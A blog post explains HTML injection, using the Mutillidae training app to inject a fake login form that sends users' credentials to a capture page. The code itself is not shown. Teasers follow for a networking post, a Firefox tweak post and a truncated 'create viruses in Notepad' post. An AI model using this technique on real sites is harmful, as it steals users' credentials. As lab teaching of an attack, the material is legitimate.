Skip to main content

How to hack mostly websites with HTML Injection in 3 minutes.

                          Hacking website- HTML Injection


HTML Injection
HTML Injection is a vulnerability which occurs in web applications that allows users to insert html code via a specific parameter for example or an entry point. This type of attack can be used in combination with some sort of social engineering in order to trick valid users of the application to open malicious websites or to insert their credentials in a fake login form that it will redirect the users to a page that captures cookies and credentials. In this tutorial we are going to see how we can exploit this vulnerability effectively once it is discovered. For the needs of the article the Mutillidae will be used as the vulnerable application.


Vulnerable Form
Of course in this example there is an indication that this form is accepting HTML tags as it is part of the functionality of the application. A malicious attacker will think that he can exploit the users of this application if he set up a page that is capturing their cookies and credentials in his server. If he has this page then he can trick the users to enter their credentials by injecting into the vulnerable page a fake HTML login form. Mutillidae has already a data captured page so we are going to use this page for our tutorial
.
Mutillidae – Data Capture Page
Injecting HTML Code – Fake Login
Now we can inject HTML code that it will cause the application to load a fake login form.

.
Injecting HTML Code – Fake Login
.
Fake Login Form
Every user that will enter his credentials it will redirected to another page where his credentials will stored. In this case the credentials can be found at the data capture page and we can see them below:



As we saw in this article HTML injection vulnerabilities are very easy to exploit and can have large impact as any user of the web application can be a target. System admins must take appropriate measures for their web applications in order to prevent these type of attacks.

Comments

Post a Comment

Popular posts from this blog

About Basic Networking Topology

           Basic Networking Topology This article describes common topologies used for networking. These are a very basic examples, and large networks often use a combination of two or more topologies. Introduction The term "topology" is used to describe the infrastructure of a network. It is a basic map or scheme of how the network is constructed. Viewing the topology of a network is a lot like looking at the map of city. You can see the central points or landmarks. Popular points of the cities are usually surrounded by a dense population of residents. The same is true for computer networks. The popular points (usually servers) are surrounded by residents (client machines) that connect to the server. If you read a networking book about topology, they will probably cover the physical types of topologies like star, ring, bus, and mesh. While these were all commonly used topologies at one point in time, star...
Post a Comment
Read more

How to hack mozilla firefox brower with in seconds and increase the speed 3X.

Amazing Mozilla Firefox Tips and Tricks To Improving Your Browsing Experience The use of Mozilla Browser is very common browser now a days. Today I  am share some very useful tricks.  Here are some simple tricks which I gathered from different website .    1. THIS IS  SIMPLE TRICK IN MOZILLA FIREFOX WHERE YOU CAN INCREASE YOUR SPEED ITS JUST 3 STEPS FOLLOW THE INSTRUCTION : Step 1:- Type “about:config” into the address bar(URL Bar) of Mozilla firebox and then press enter . And find some code .   Step 2:- Now Alter(changes) the entries as follows:     Set “network.http.pipelining” to “true” then   Set “network.http.proxy.pipelining” to “true”    set “network.http.pipelining.maxrequests” to some number like 29 or 30. This means it will make 29 or 30 requests at once. Step 3:- In the last step right-click anywhere and select New-> Integer . Name it “nglayout....
Post a Comment
Read more

How to hack anyone System in seconds and Create viruses

G et some knowledge about virus... What is Virus ?  A computer virus is a program or piece of code that is loaded onto your computer without your knowledge and runs against your wishes. All computer viruses are man-made. A simple virus that can make a copy of itself over and over again is relatively easy to produce. Even such a simple virus is dangerous because it will quickly use all available memory and bring the system to a halt. An even more dangerous type of virus is one capable of transmitting itself across networks and bypassing security systems   Create Virus on Notepad : It is very easy to create a virus on notepad   H ow to open notepad follow these steps 1. P ush win + R then new window will open then type notepad and click on OK . After that notepad will open then type or paste these command and make a virus.   1 -> Virus Creation Tricks 1 Just open the Notepad and type the paste the following Code. set ws=createobje...
3 comments
Read more